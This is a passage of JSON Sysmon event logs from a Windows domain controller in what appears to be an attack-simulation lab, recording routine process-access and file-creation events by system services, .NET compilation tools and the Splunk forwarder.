C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-00100D830E00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-00100D830E00}","TargetProcessId":"4652","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.169\r\nSourceProcessGUID: {E2A3D6B1-1367-5F25-0000-00100D830E00}\r\nSourceProcessId: 4652\r\nSourceThreadId: 1576\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.169","SourceProcessGUID":"{E2A3D6B1-1367-5F25-0000-00100D830E00}","SourceProcessId":"4652","SourceThreadId":"1576","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:59.435\r\nProcessGuid: {E2A3D6B1-1366-5F25-0000-0010947F0E00}\r\nProcessId: 4428\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\114c-0\\System.Data.Services.Design.dll\r\nCreationUtcTime: 2020-08-01 07:01:59.435","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:59.435","ProcessGuid":"{E2A3D6B1-1366-5F25-0000-0010947F0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\114c-0\\System.Data.Services.Design.dll","CreationUtcTime":"2020-08-01 07:01:59.435","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.482\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-0010922A0E00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.482","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-0010922A0E00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.482\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-0010922A0E00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.482","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-0010922A0E00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.482\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-0010922A0E00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.482","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-0010922A0E00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.544\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-001012890E00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.544","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-001012890E00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.544\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: 